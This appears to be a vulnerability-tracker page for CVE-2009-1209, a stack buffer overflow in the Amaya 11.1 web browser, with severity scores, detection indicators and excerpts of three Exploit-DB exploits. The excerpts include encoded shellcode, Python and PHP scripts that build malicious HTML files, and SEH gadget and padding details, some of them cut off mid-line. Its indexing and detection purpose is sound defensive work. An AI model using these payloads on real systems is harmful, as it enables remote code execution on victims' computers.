CVE-2009-1209
published 2009-04-01CVE-2009-1209: Stack-based buffer overflow in W3C Amaya Web Browser 11.1 allows remote attackers to execute arbitrary code via a script tag with a long defer attribute.
PriorityP357critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
12.37%
95.7th percentile
Stack-based buffer overflow in W3C Amaya Web Browser 11.1 allows remote attackers to execute arbitrary code via a script tag with a long defer attribute.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w3 | amaya | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJITiKyosYyyN8YzN9IT4utL4SkoqRSwcUOJKKJ7rMSzKKLIrkDysvcONtBUOjKrQCwEscPlFEWcWJJVuk9pPkCPqqMeokZTQPKLTkoQaws8qYJFZmKLsbOVZBVvxEzfPdOwnQ921l6Q4OOyN362JfnrQSmUkkZr1e4OdhgnQLISp9gkKZIntL7qa5Sl4QroV5vUKDhxKyR3KSPMjTrMJvKnbVnlTLkKFOyPozWf7NiqgXcTQVkMDbKqZtBuOXkT1pjusNTJkL4cOMmPszZmLtkmQsbRWUKppS6SpMSQrilNum5nMYmL8k8ok2NSLjKkJ32WzA
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63
- →Exploit triggers via an HTML <script> tag with an excessively long 'defer' attribute — detect HTTP responses or files containing a <script> tag where the defer attribute value is abnormally large (thousands of characters). ↗
- →Exploit payload uses a SEH (Structured Exception Handler) overwrite chain; the pop/pop/ret gadget address 0x02101917 is located inside an Amaya module — presence of this address in a crash context or memory scan of Amaya is indicative of exploitation. ↗
- →Exploit requires a buffer of ~6887 bytes of padding before the SEH overwrite — network or file-based detection should flag HTML files with a <script defer=...> attribute value exceeding ~6000 characters. ↗
- →Malicious HTML exploit files targeting this CVE have been observed with the filenames 'exploit.html', 'remote_love.html', and 'Devil_inside.html' — monitor for creation or download of these filenames. ↗
- →The exploit targets Windows XP SP2 specifically; Amaya 11.1 and 11.2 are the confirmed vulnerable versions. ↗
- ·The SEH pop/pop/ret gadget address (0x02101917) is specific to the Amaya module as shipped; this address may differ across builds, patch levels, or OS configurations and should be validated before use in signatures. ↗
- ·Two distinct shellcode payloads are present across exploit variants (alphanumeric SEH exploit for 11.2 vs. raw x86 shellcode for 11.1); detection rules should account for both encodings. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)
exploitdb·2009-08-03
CVE-2009-1209 Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)
Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-374 bytes.
shellcode = (
"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"TiKyosYyyN8YzN9IT4utL4SkoqRSwcUOJKKJ7rMSzKKLIrkDysv"
"cONtBUOjKrQCwEscPlFEWcWJJVuk9pPkCPqqMeokZTQPKLTkoQa"
"ws8qYJFZmKLsbOVZBVvxEzfPdOwnQ921l6Q4OOyN362JfnrQSmU"
"kkZr1e4OdhgnQLISp9gkKZIntL7qa5Sl4QroV5vUKDhxKyR3KSP"
"MjTrMJvKnbVnlTLkKFOyPozWf7NiqgXcTQVkMDbKqZtBuOXkT1p"
"jusNTJkL4cOMmPszZmLtkmQsbRWUKppS6SpMSQrilNum5nMYmL8"
"k8ok2NSLjKkJ32WzA")
payload = ""
try:
out_file = open("exploit.html","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-08-03]
Exploit-DB
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)
exploitdb·2009-03-30
CVE-2009-1209 Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)
---
";
$hnd = fopen("remote_love.html","w");
if($hnd){
fputs($hnd,$hello);
fclose($hnd);
echo"DONE !!\n";
} else {
echo"Kupa !!\n";
}
?>
# milw0rm.com [2009-03-30]
Exploit-DB
Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
exploitdb·2009-03-30
CVE-2009-1209 Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
---
# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Origninal Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note:you need to upload Devil_inside.html to a remote host
# Works with windows xp sp2
#
# metasploit - run calc.exe
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
"\x58\x30\x41\x30\x50\x41\x6b\x41\x41\x73\x32\x41\x42\x41\x32\x42"
"\x42\x30\x42\x42\x58\x42\x50\x38\x41\x42\x75\x4d\x39\x59\x6c\x4d"
"\x38\x42\x64\x33\x30\x37\x70\x47\x70\x4e\x6b\x52\x65\x65\x6c\x6e"
"\x6b\x41\x6c\x74\
No writeups or analysis indexed.
http://secunia.com/advisories/34531http://www.securityfocus.com/bid/34295http://www.vupen.com/english/advisories/2009/0889https://exchange.xforce.ibmcloud.com/vulnerabilities/47399https://www.exploit-db.com/exploits/8314https://www.exploit-db.com/exploits/8321http://secunia.com/advisories/34531http://www.securityfocus.com/bid/34295http://www.vupen.com/english/advisories/2009/0889https://exchange.xforce.ibmcloud.com/vulnerabilities/47399https://www.exploit-db.com/exploits/8314https://www.exploit-db.com/exploits/8321
2009-04-01
Published